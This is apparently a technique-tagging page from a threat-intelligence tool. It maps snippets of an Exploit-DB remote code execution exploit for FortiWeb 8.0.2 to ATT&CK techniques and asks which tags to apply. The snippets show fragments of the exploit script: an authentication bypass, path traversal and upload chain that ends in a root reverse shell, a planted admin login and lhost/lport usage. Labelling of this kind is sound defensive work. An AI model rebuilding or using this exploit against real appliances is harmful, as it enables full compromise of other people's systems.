Exploit-DB
[webapps] FortiWeb 8.0.2 - Remote Code Execution
ATT&CK techniques detected
T1190Exploit Public-Facing Application
97%
“( critical ) # category : webapps # platform : hardware / appliance ( linux - based ) # critical : true # including : authentication bypass + path traversal + arbitrary file upload → rce # impact : full system compromise, root reverse shell # fix : upgrade to fortiweb 7. 6. 7, 7.…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
96%
“[ webapps ] fortiweb 8. 0. 2 - remote code execution fortiweb 8. 0. 2 - remote code execution # exploit title : fortiweb 8. 0. 2 - remote code execution # date : 2025 - 11 - 22 # author : mohammed idrees banyamer # author country : jordan # instagram : @ banyamer _ security # git…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.006Python
74%
“banyamer _ security lab / authorized testing only " " " ) if len ( sys. argv )! = 4 : banner ( ) print ( " usage : python3 fortiweb _ rce. py < target > < lhost > < lport > " ) print ( " example : python3 fortiweb _ rce. py https : / / 192. 168. 100. 50 : 8443 192. 168. 45. 10 44…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1505.003Web Shell
74%
“print ( " [ 2 ] logging in with new admin... " ) login = s. post ( f " { target } / api / v2. 0 / login ", json = { " username " : " pwnedadmin ", " password " : " pwned123! " }, timeout = 10 ) if " success " not in login. text : print ( " [ - ] login failed " ) return shell = f …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
FortiWeb 8.0.2 - Remote Code Execution